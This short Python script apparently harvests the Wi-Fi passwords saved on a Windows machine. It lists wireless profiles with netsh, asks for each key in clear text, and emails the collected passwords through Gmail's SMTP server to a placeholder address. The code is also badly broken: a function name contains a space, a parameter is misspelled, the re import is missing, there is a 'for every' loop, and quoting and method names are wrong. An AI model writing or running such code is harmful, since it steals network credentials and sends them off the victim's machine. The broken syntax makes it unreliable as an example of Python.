#!usr/bin/env python
import subprocess
import smtplib

def send mail(emial,password,message):
    server=smtplib.SMTP("smtp.gmail.com",587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email,email,message)
    server.quit()

command = "netsh wlan show profile"
networks=subprocess.check_output(command,shell=True)
network_names_list = re.findall("(?:Profile\s*:\s)(.*)",networks)

result=""

for every network in network_names_list:
    command = "netsh wlan show profile"+network_names_list+"key=clear"
    current_result=subprocess.checkoutput(command, shell=True)
    result=result+"current_result"



send_mail("<mailid>","<password>",result")
